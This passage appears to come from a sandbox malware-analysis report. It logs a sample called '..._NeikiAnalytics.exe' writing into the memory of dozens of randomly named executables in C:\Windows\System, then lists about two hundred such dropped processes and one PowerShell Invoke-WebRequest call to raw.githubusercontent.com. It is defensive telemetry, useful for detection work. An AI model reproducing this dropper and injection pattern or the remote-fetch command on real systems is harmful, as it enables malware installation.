PID 1132 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\NBwwSeE.exe
PID 1132 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\NBwwSeE.exe
PID 1132 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\WfHbuen.exe
PID 1132 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\WfHbuen.exe
PID 1132 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\WfHbuen.exe
PID 1132 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HOOeZOI.exe
PID 1132 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HOOeZOI.exe
PID 1132 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HOOeZOI.exe
PID 1132 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OdJEkua.exe
PID 1132 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OdJEkua.exe
PID 1132 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OdJEkua.exe
PID 1132 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IIkAmVd.exe
PID 1132 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IIkAmVd.exe
PID 1132 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IIkAmVd.exe
PID 1132 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\dnGebKH.exe
PID 1132 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\dnGebKH.exe
PID 1132 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\dnGebKH.exe
PID 1132 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IQchZOJ.exe
PID 1132 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IQchZOJ.exe
PID 1132 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\IQchZOJ.exe
PID 1132 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HDhVHCy.exe
PID 1132 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HDhVHCy.exe
PID 1132 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\HDhVHCy.exe
PID 1132 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bJNRUtZ.exe
PID 1132 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bJNRUtZ.exe
PID 1132 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bJNRUtZ.exe
PID 1132 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\XDfVSGN.exe
PID 1132 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\XDfVSGN.exe
PID 1132 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\XDfVSGN.exe
PID 1132 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\diKaaKt.exe
PID 1132 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\diKaaKt.exe
PID 1132 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\diKaaKt.exe
PID 1132 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\jrSOrkG.exe
PID 1132 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\jrSOrkG.exe
PID 1132 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\jrSOrkG.exe
PID 1132 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\waHeSAk.exe
PID 1132 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\waHeSAk.exe
PID 1132 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\waHeSAk.exe
PID 1132 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\iYabiuZ.exe
PID 1132 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\iYabiuZ.exe
PID 1132 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\iYabiuZ.exe
PID 1132 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\voSvWQc.exe
PID 1132 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\voSvWQc.exe
PID 1132 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\voSvWQc.exe
PID 1132 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FxhehAh.exe
PID 1132 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FxhehAh.exe
PID 1132 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\FxhehAh.exe
PID 1132 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YrFARoH.exe
PID 1132 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YrFARoH.exe
PID 1132 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YrFARoH.exe
PID 1132 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\gdOLxKL.exe
PID 1132 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\gdOLxKL.exe
PID 1132 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\gdOLxKL.exe
PID 1132 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\axIkokP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\FDLeIvg.exe

C:\Windows\System\FDLeIvg.exe

C:\Windows\System\oGCXxxs.exe

C:\Windows\System\oGCXxxs.exe

C:\Windows\System\NBwwSeE.exe

C:\Windows\System\NBwwSeE.exe

C:\Windows\System\WfHbuen.exe

C:\Windows\System\WfHbuen.exe

C:\Windows\System\HOOeZOI.exe

C:\Windows\System\HOOeZOI.exe

C:\Windows\System\OdJEkua.exe

C:\Windows\System\OdJEkua.exe

C:\Windows\System\IIkAmVd.exe

C:\Windows\System\IIkAmVd.exe

C:\Windows\System\dnGebKH.exe

C:\Windows\System\dnGebKH.exe

C:\Windows\System\IQchZOJ.exe

C:\Windows\System\IQchZOJ.exe

C:\Windows\System\HDhVHCy.exe

C:\Windows\System\HDhVHCy.exe

C:\Windows\System\bJNRUtZ.exe

C:\Windows\System\bJNRUtZ.exe

C:\Windows\System\XDfVSGN.exe

C:\Windows\System\XDfVSGN.exe

C:\Windows\System\diKaaKt.exe

C:\Windows\System\diKaaKt.exe

C:\Windows\System\jrSOrkG.exe

C:\Windows\System\jrSOrkG.exe

C:\Windows\System\waHeSAk.exe

C:\Windows\System\waHeSAk.exe

C:\Windows\System\iYabiuZ.exe

C:\Windows\System\iYabiuZ.exe

C:\Windows\System\voSvWQc.exe

C:\Windows\System\voSvWQc.exe

C:\Windows\System\FxhehAh.exe

C:\Windows\System\FxhehAh.exe

C:\Windows\System\YrFARoH.exe

C:\Windows\System\YrFARoH.exe

C:\Windows\System\gdOLxKL.exe

C:\Windows\System\gdOLxKL.exe

C:\Windows\System\axIkokP.exe

C:\Windows\System\axIkokP.exe

C:\Windows\System\vAJZOHV.exe

C:\Windows\System\vAJZOHV.exe

C:\Windows\System\OBBmTtL.exe

C:\Windows\System\OBBmTtL.exe

C:\Windows\System\vFhHTeW.exe

C:\Windows\System\vFhHTeW.exe

C:\Windows\System\Ncmakup.exe

C:\Windows\System\Ncmakup.exe

C:\Windows\System\ZxoLqxz.exe

C:\Windows\System\ZxoLqxz.exe

C:\Windows\System\vnqFrqL.exe

C:\Windows\System\vnqFrqL.exe

C:\Windows\System\CMNPxpd.exe

C:\Windows\System\CMNPxpd.exe

C:\Windows\System\ZApfqSP.exe

C:\Windows\System\ZApfqSP.exe

C:\Windows\System\zfHJQCJ.exe

C:\Windows\System\zfHJQCJ.exe

C:\Windows\System\cqUHqOD.exe

C:\Windows\System\cqUHqOD.exe

C:\Windows\System\taIAGlq.exe

C:\Windows\System\taIAGlq.exe

C:\Windows\System\gWmybRy.exe

C:\Windows\System\gWmybRy.exe

C:\Windows\System\pMmZjfH.exe

C:\Windows\System\pMmZjfH.exe

C:\Windows\System\eknxJdr.exe

C:\Windows\System\eknxJdr.exe

C:\Windows\System\XvROmgU.exe

C:\Windows\System\XvROmgU.exe

C:\Windows\System\AvomAav.exe

C:\Windows\System\AvomAav.exe

C:\Windows\System\GMtFeyY.exe

C:\Windows\System\GMtFeyY.exe

C:\Windows\System\kOZxiwr.exe

C:\Windows\System\kOZxiwr.exe

C:\Windows\System\qRXJWRz.exe

C:\Windows\System\qRXJWRz.exe

C:\Windows\System\WZJJeil.exe

C:\Windows\System\WZJJeil.exe

C:\Windows\System\mGHRLkd.exe

C:\Windows\System\mGHRLkd.exe

C:\Windows\System\BxSCsgg.exe

C:\Windows\System\BxSCsgg.exe

C:\Windows\System\mWQyPCJ.exe

C:\Windows\System\mWQyPCJ.exe

C:\Windows\System\NqqupPX.exe

C:\Windows\System\NqqupPX.exe

C:\Windows\System\nBMVerW.exe

C:\Windows\System\nBMVerW.exe

C:\Windows\System\xYpyeuP.exe

C:\Windows\System\xYpyeuP.exe

C:\Windows\System\xlazHeq.exe

C:\Windows\System\xlazHeq.exe

C:\Windows\System\kIiLHYC.exe

C:\Windows\System\kIiLHYC.exe

C:\Windows\System\dUanbYA.exe

C:\Windows\System\dUanbYA.exe

C:\Windows\System\pkZGZFy.exe

C:\Windows\System\pkZGZFy.exe

C:\Windows\System\rAewIuS.exe

C:\Windows\System\rAewIuS.exe

C:\Windows\System\JeKguER.exe

C:\Windows\System\JeKguER.exe

C:\Windows\System\RkffqUL.exe

C:\Windows\System\RkffqUL.exe

C:\Windows\System\QzcvKYO.exe

C:\Windows\System\QzcvKYO.exe

C:\Windows\System\XEOhpeV.exe

C:\Windows\System\XEOhpeV.exe

C:\Windows\System\TSzERwb.exe

C:\Windows\System\TSzERwb.exe

C:\Windows\System\lidiAxU.exe

C:\Windows\System\lidiAxU.exe

C:\Windows\System\epaSerL.exe

C:\Windows\System\epaSerL.exe

C:\Windows\System\EjZRbTk.exe

C:\Windows\System\EjZRbTk.exe

C:\Windows\System\MppZAVp.exe

C:\Windows\System\MppZAVp.exe

C:\Windows\System\kJLbmFR.exe

C:\Windows\System\kJLbmFR.exe

C:\Windows\System\mOnwlSW.exe

C:\Windows\System\mOnwlSW.exe

C:\Windows\System\KiQEWYm.exe

C:\Windows\System\KiQEWYm.exe

C:\Windows\System\icAEOzp.exe

C:\Windows\System\icAEOzp.exe

C:\Windows\System\wJMNNZv.exe

C:\Windows\System\wJMNNZv.exe

C:\Windows\System\ZSXqwjJ.exe

C:\Windows\System\ZSXqwjJ.exe

C:\Windows\System\bHuDIuf.exe

C:\Windows\System\bHuDIuf.exe

C:\Windows\System\tEAbGia.exe

C:\Windows\System\tEAbGia.exe

C:\Windows\System\WaRkBlA.exe

C:\Windows\System\WaRkBlA.exe

C:\Windows\System\mnBDDVe.exe

C:\Windows\System\mnBDDVe.exe

C:\Windows\System\zdzSaBd.exe

C:\Windows\System\zdzSaBd.exe

C:\Windows\System\pquxtSk.exe

C:\Windows\System\pquxtSk.exe

C:\Windows\System\kLpUJbZ.exe

C:\Windows\System\kLpUJbZ.exe

C:\Windows\System\kkkpbJO.exe

C:\Windows\System\kkkpbJO.exe

C:\Windows\System\rGoFwku.exe

C:\Windows\System\rGoFwku.exe

C:\Windows\System\DuvlUUm.exe

C:\Windows\System\DuvlUUm.exe

C:\Windows\System\KTPXEfI.exe

C:\Windows\System\KTPXEfI.exe

C:\Windows\System\cEkCGmB.exe

C:\Windows\System\cEkCGmB.exe

C:\Windows\System\TXpfpSZ.exe

C:\Windows\System\TXpfpSZ.exe

C:\Windows\System\RdjofMs.exe

C:\Windows\System\RdjofMs.exe

C:\Windows\System\TVmxnWk.exe

C:\Windows\System\TVmxnWk.exe

C:\Windows\System\WCpUqYL.exe

C:\Windows\System\WCpUqYL.exe

C:\Windows\System\eLIVrMI.exe

C:\Windows\System\eLIVrMI.exe

C:\Windows\System\jzfIxYl.exe

C:\Windows\System\jzfIxYl.exe

C:\Windows\System\rtWkZqJ.exe

C:\Windows\System\rtWkZqJ.exe

C:\Windows\System\uuzqgOR.exe

C:\Windows\System\uuzqgOR.exe

C:\Windows\System\YEAKrGV.exe

C:\Windows\System\YEAKrGV.exe

C:\Windows\System\gvezKUL.exe

C:\Windows\System\gvezKUL.exe

C:\Windows\System\RuDyyBM.exe

C:\Windows\System\RuDyyBM.exe

C:\Windows\System\MUlWlcy.exe

C:\Windows\System\MUlWlcy.exe

C:\Windows\System\jbajjhJ.exe

C:\Windows\System\jbajjhJ.exe

C:\Windows\System\GItpFxJ.exe

C:\Windows\System\GItpFxJ.exe

C:\Windows\System\XNCSRay.exe

C:\Windows\System\XNCSRay.exe

C:\Windows\System\AkVLVlT.exe

C:\Windows\System\AkVLVlT.exe

C:\Windows\System\TwZHNxK.exe

C:\Windows\System\TwZHNxK.exe

C:\Windows\System\kVAUgAf.exe

C:\Windows\System\kVAUgAf.exe

C:\Windows\System\IZQcMXu.exe

C:\Windows\System\IZQcMXu.exe

C:\Windows\System\qjZNDOE.exe

C:\Windows\System\qjZNDOE.exe

C:\Windows\System\dJHTjTU.exe

C:\Windows\System\dJHTjTU.exe

C:\Windows\System\UPQjLwo.exe

C:\Windows\System\UPQjLwo.exe

C:\Windows\System\IzhdmYx.exe

C:\Windows\System\IzhdmYx.exe

C:\Windows\System\rCbDAIG.exe

C:\Windows\System\rCbDAIG.exe

C:\Windows\System\QfzbJMG.exe

C:\Windows\System\QfzbJMG.exe

C:\Windows\System\QnXsqPh.exe

C:\Windows\System\QnXsqPh.exe

C:\Windows\System\APtbcQe.exe

C:\Windows\System\APtbcQe.exe

C:\Windows\System\IljOmVD.exe

C:\Windows\System\IljOmVD.exe

C:\Windows\System\KopRqtr.exe

C:\Windows\System\KopRqtr.exe

C:\Windows\System\KALiaIo.exe

C:\Windows\System\KALiaIo.exe

C:\Windows\System\yFGVEvs.exe

C:\Windows\System\yFGVEvs.exe

C:\Windows\System\TNYyVrX.exe

C:\Windows\System\TNYyVrX.exe

C:\Windows\System\vNLXgEM.exe

C:\Windows\System\vNLXgEM.exe

C:\Windows\System\DTxVyrW.exe

C:\Windows\System\DTxVyrW.exe

C:\Windows\System\aGrfJBo.exe

C:\Windows\System\aGrfJBo.exe

C:\Windows\System\duITldv.exe

C:\Windows\System\duITldv.exe

C:\Windows\System\DgeqWzS.exe

C:\Windows\System\DgeqWzS.exe

C:\Windows\System\roLvlhJ.exe

C:\Windows\System\roLvlhJ.exe

C:\Windows\System\rTviYPO.exe

C:\Windows\System\rTviYPO.exe

C:\Windows\System\jgGZsGd.exe

C:\Windows\System\jgGZsGd.exe

C:\Windows\System\vGsiqOJ.exe

C:\Windows\System\vGsiqOJ.exe

C:\Windows\System\eJrfhHn.exe

C:\Windows\System\eJrfhHn.exe

C:\Windows\System\uUOpLfr.exe

C:\Windows\System\uUOpLfr.exe

C:\Windows\System\ESjWxGF.exe

C:\Windows\System\ESjWxGF.exe

C:\Windows\System\dqwkmwW.exe

C:\Windows\System\dqwkmwW.exe

C:\Windows\System\HMUVXnH.exe

C:\Windows\System\HMUVXnH.exe

C:\Windows\System\sSjTwuI.exe

C:\Windows\System\sSjTwuI.exe

C:\Windows\System\gKbkfQJ.exe

C:\Windows\System\gKbkfQJ.exe

C:\Windows\System\VFfubtB.exe

C:\Windows\System\VFfubtB.exe

C:\Windows\System\whRDToW.exe

C:\Windows\System\whRDToW.exe

C:\Windows\System\VKKympO.exe

C:\Windows\System\VKKympO.exe

C:\Windows\System\QEZnCkj.exe

C:\Windows\System\QEZnCkj.exe

C:\Windows\System\zjepkLq.exe

C:\Windows\System\zjepkLq.exe

C:\Windows\System\yYJfXZN.exe

C:\Windows\System\yYJfXZN.exe

C:\Windows\System\iyvwMOk.exe

C:\Windows\System\iyvwMOk.exe

C:\Windows\System\VPbECuH.exe

C:\Windows\System\VPbECuH.exe

C:\Windows\System\QVnwmkI.exe

C:\Windows\System\QVnwmkI.exe

C:\Windows\System\LMJWGpB.exe

C:\Windows\System\LMJWGpB.exe

C:\Windows\System\zkrSMVg.exe

C:\Windows\System\zkrSMVg.exe

C:\Windows\System\clbQrdk.exe

C:\Windows\System\clbQrdk.exe

C:\Windows\System\jEhqhcl.exe

C:\Windows\System\jEhqhcl.exe

C:\Windows\System\jrcyVpT.exe

C:\Windows\System\jrcyVpT.exe

C:\Windows\System\NMSZfAE.exe

C:\Windows\System\NMSZfAE.exe

C:\Windows\System\squHsqR.exe

C:\Windows\System\squHsqR.exe

C:\Windows\System\CvDKoeC.exe

C:\Windows\System\CvDKoeC.exe

C:\Windows\System\rmQCuGv.exe

C:\Windows\System\rmQCuGv.exe

C:\Windows\System\TqjZgzN.exe

C:\Windows\System\TqjZgzN.exe

C:\Windows\System\NrjeTEt.exe

C:\Windows\System\NrjeTEt.exe

C:\Windows\System\NFCzcEY.exe

C:\Windows\System\NFCzcEY.exe

C:\Windows\System\RGWiqLL.exe

C:\Windows\System\RGWiqLL.exe

C:\Windows\System\stIwbIY.exe

C:\Windows\System\stIwbIY.exe

C:\Windows\System\dGeHnxp.exe

C:\Windows\System\dGeHnxp.exe

C:\Windows\System\LozZweZ.exe

C:\Windows\System\LozZweZ.exe

C:\Windows\System\SKaMfwo.exe

C:\Windows\System\SKaMfwo.exe

C:\Windows\System\HZZRLoe.exe

C:\Windows\System\HZZRLoe.exe

C:\Windows\System\uCraTWm.exe

C:\Windows\System\uCraTWm.exe

C:\Windows\System\HupUTbR.exe

C:\Windows\System\HupUTbR.exe

C:\Windows\System\dicZcnI.exe

C:\Windows\System\dicZcnI.exe

C:\Windows\System\fKuwrla.exe

C:\Windows\System\fKuwrla.exe

C:\Windows\System\UCHPaaN.exe

C:\Windows\System\UCHPaaN.exe

C:\Windows\System\AklEFkj.exe

C:\Windows\System\AklEFkj.exe

C:\Windows\System\UYcsHEz.exe

C:\Windows\System\UYcsHEz.exe

C:\Windows\System\sZhHkTa.exe

C:\Windows\System\sZhHkTa.exe

C:\Windows\System\QkjHZaT.exe

C:\Windows\System\QkjHZaT.exe

C:\Windows\System\AzpgOzu.exe

C:\Windows\System\AzpgOzu.exe

C:\Windows\System\OHqKiVd.exe

C:\Windows\System\OHqKiVd.exe

C:\Windows\System\nhJVLwQ.exe

C:\Windows\System\nhJVLwQ.exe

C:\Windows\System\tphqUyJ.exe

C:\Windows\System\tphqUyJ.exe

C:\Windows\System\blyXBed.exe

C:\Windows\System\blyXBed.exe

C:\Windows\System\VxvDZCU.exe

C:\Windows\System\VxvDZCU.exe

C:\Windows\System\kOFUFLU.exe

C:\Windows\System\kOFUFLU.exe

C:\Windows\System\sHrsMbI.exe

C:\Windows\System\sHrsMbI.exe

C:\Windows\System\yWnwcZs.exe

C:\Windows\System\yWnwcZs.exe

C:\Windows\System\CRTgApq.exe

C:\Windows\System\CRTgApq.exe

C:\Windows\System\VqZcENG.exe

C:\Windows\System\VqZcENG.exe

C:\Windows\System\VlBjien.exe

C:\Windows\System\VlBjien.exe

C:\Windows\System\AmOpepo.exe

C:\Windows\System\AmOpepo.exe

C:\Windows\System\vahrYPt.exe

C:\Windows\System\vahrYPt.exe

C:\Windows\System\xeSlyap.exe

C:\Windows\System\xeSlyap.exe

C:\Windows\System\kdqTyZd.exe

C:\Windows\System\kdqTyZd.exe

C:\Windows\System\EzXxKuF.exe

C:\Windows\System\EzXxKuF.exe

C:\Windows\System\eAYBQKn.exe

C:\Windows\System\eAYBQKn.exe

C:\Windows\System\lVPJpTJ.exe

C:\Windows\System\lVPJpTJ.exe

C:\Windows\System\fAuQEJA.exe

C:\Windows\System\fAuQEJA.exe

C:\Windows\System\xFyqCSS.exe

C:\Windows\System\xFyqCSS.exe

C:\Windows\System\dMAOLfe.exe

C:\Windows\System\dMAOLfe.exe

C:\Windows\System\lweOeok.exe

C:\Windows\System\lweOeok.exe

C:\Windows\System\sxiBNmA.exe

C:\Windows\System\sxiBNmA.exe

C:\Windows\System\iBrgzSP.exe

C:\Windows\System\iBrgzSP.exe

C:\Windows\System\Jxjqqwi.exe

C:\Windows\System\Jxjqqwi.exe

C:\Windows\System\sHfvfiS.exe

C:\Windows\System\sHfvfiS.exe

C:\Windows\System\CWPwqTH.exe

C:\Windows\System\CWPwqTH.exe

C:\Windows\System\jSgvhzh.exe

C:\Windows\System\jSgvhzh.exe

C:\Windows\System\uavWBPh.exe

C:\Windows\System\uavWBPh.exe

C:\Windows\System\lszKnli.exe

C:\Windows\System\lszKnli.exe

C:\Windows\System\xQySUNW.exe

C:\Windows\System\xQySUNW.exe

C:\Windows\System\ISLyqmo.exe

C:\Windows\System\ISLyqmo.exe

C:\Windows\System\RpZWsYg.exe

C:\Windows\System\RpZWsYg.exe

C:\Windows\System\OealZVj.exe

C:\Windows\System\OealZVj.exe

C:\Windows\System\neCFnVf.exe

C:\Windows\System\neCFnVf.exe

C:\Windows\System\erdaqHJ.exe

C:\Windows\System\erdaqHJ.exe

C:\Windows\System\sZVUWcO.exe

C:\Windows\System\sZVUWcO.exe

C:\Windows\System\zPxqvJR.exe

C:\Windows\System\zPxqvJR.exe

C:\Windows\System\dvgWPsf.exe

C:\Windows\System\dvgWPsf.exe

C:\Windows\System\zlEovFw.exe

C:\Windows\System\zlEovFw.exe

C:\Windows\System\GegFzZa.exe

C:\Windows\System\GegFzZa.exe

C:\Windows\System\xnBnjPn.exe

C:\Windows\System\xnBnjPn.exe

C:\Windows\System\QIdoQQU.exe

C:\Windows\System\QIdoQQU.exe

C:\Windows\System\rFhrkBY.exe

C:\Windows\System\rFhrkBY.exe

C:\Windows\System\VLbgHyy.exe

C:\Windows\System\VLbgHyy.exe

C:\Windows\System\mIusqjb.exe

C:\Windows\System\mIusqjb.exe

C:\Windows\System\WZJggHD.exe

C:\Windows\System\WZJggHD.exe

C:\Windows\System\kumWDeb.exe

C:\Windows\System\kumWDeb.exe

C:\Windows\System\mTQcwaY.exe

C:\Windows\System\mTQcwaY.exe

C:\Windows\System\cOEcmry.exe

C:\Windows\System\cOEcmry.exe

C:\Windows\System\EqDcbJR.exe

C:\Windows\System\EqDcbJR.exe

C:\Windows\System\weMKVdH.exe

C:\Windows\System\weMKVdH.exe

C:\Windows\System\JAoaiZl.exe

C:\Windows\System\JAoaiZl.exe

C:\Windows\System\rOndoLB.exe

C:\Windows\System\rOndoLB.exe

C:\Windows\System\bRosNXH.exe

C:\Windows\System\bRosNXH.exe

C:\Windows\System\AUVeVmP.exe

C:\Windows\System\AUVeVmP.exe

C:\Windows\System\alCQnEs.exe

C:\Windows\System\alCQnEs.exe

C:\Windows\System\cffmIZG.exe

C:\Windows\System\cffmIZG.exe

C:\Windows\System\IETrMcj.exe

C:\Windows\System\IETrMcj.exe

C:\Windows\System\ShIgkve.exe

C:\Windows\System\ShIgkve.exe

C:\Windows\System\ADJTFGK.exe

C:\Windows\System\ADJTFGK.exe

C:\Windows\System\beiDBjn.exe

C:\Windows\System\beiDBjn.exe

C:\Windows\System\IDLYbTn.exe

C:\Windows\System\IDLYbTn.exe

C:\Windows\System\zghTnJE.exe

C:\Windows\System\zghTnJE.exe

C:\Windows\System\GZUvhuj.exe

C:\Windows\System\GZUvhuj.exe

C:\Windows\System\NTeGLqD.exe

C:\Windows\System\NTeGLqD.exe

C:\Windows\System\IwxBCKK.exe

C:\Windows\System\IwxBCKK.exe

C:\Windows\System\RSUJBxO.exe

C:\Windows\System\RSUJBxO.exe

C:\Windows\System\fSYDlzK.exe

C:\Windows\System\fSYDlzK.exe

C:\Windows\System\tqYXqZQ.exe

C:\Windows\System\tqYXqZQ.exe

C:\Windows\System\uaSBhwN.exe

C:\Windows\System\uaSBhwN.exe

C:\Windows\System\mriUcQw.exe

C:\Windows\System\mriUcQw.exe

C:\Windows\System\TeqNaFq.exe

C:\Windows\System\TeqNaFq.exe

C:\Windows\System\ctGBiNv.exe

C:\Windows\System\ctGBiNv.exe

C:\Windows\System\YxeNRrK.exe

C:\Windows\System\YxeNRrK.exe

C:\Windows\System\SlVNXeB.exe

C:\Windows\System\SlVNXeB.exe

C:\Windows\System\TwqeslS.exe

C:\Windows\System\TwqeslS.exe

C:\Windows\System\isFxsKv.exe

C:\Windows\System\isFxsKv.exe

C:\Windows\System\MGclUss.exe

C:\Windows\System\MGclUss.exe

C:\Windows\System\duhorqE.exe

C:\Windows\System\duhorqE.exe

C:\Windows\System\ceXyAbN.exe

C:\Windows\System\ceXyAbN.exe

C:\Windows\System\wXByrNq.exe

